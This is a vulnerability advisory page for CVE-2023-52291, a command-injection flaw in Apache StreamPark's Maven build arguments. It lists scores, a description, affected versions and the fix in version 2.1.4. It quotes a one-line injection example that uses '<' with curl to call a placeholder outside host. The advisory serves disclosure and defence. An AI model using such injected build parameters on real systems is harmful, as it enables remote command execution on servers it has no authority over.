Lucene search

K
vulnrichmentApacheVULNRICHMENT:CVE-2023-52291
HistoryJul 17, 2024 - 8:16 a.m.

CVE-2023-52291 Apache StreamPark (incubating): Unchecked maven build params could trigger remote command execution

2024-07-1708:16:12
CWE-77
apache
github.com
5
apache streampark
maven
command execution
remote
vulnerability
mitigation
2.1.4

AI Score

7.6

Confidence

Low

EPSS

0.005

Percentile

76.8%

SSVC

Exploitation

none

Automatable

no

Technical Impact

total

In streampark, the project module integrates Maven’s compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.

Background:

In the β€œProject” module, the maven build argsΒ Β β€œ<” operator causes command injection. e.g : β€œ< (curlΒ  http://xxx.com )” will be executed as a command injection,

Mitigation:

all users should upgrade to 2.1.4,Β  The β€œ<” operator will blocked。

ADP Affected

[
  {
    "cpes": [
      "cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*"
    ],
    "vendor": "apache",
    "product": "streampark",
    "versions": [
      {
        "status": "affected",
        "version": "2.0.0",
        "lessThan": "2.1.4",
        "versionType": "semver"
      }
    ],
    "defaultStatus": "unknown"
  }
]

AI Score

7.6

Confidence

Low

EPSS

0.005

Percentile

76.8%

SSVC

Exploitation

none

Automatable

no

Technical Impact

total

Related for VULNRICHMENT:CVE-2023-52291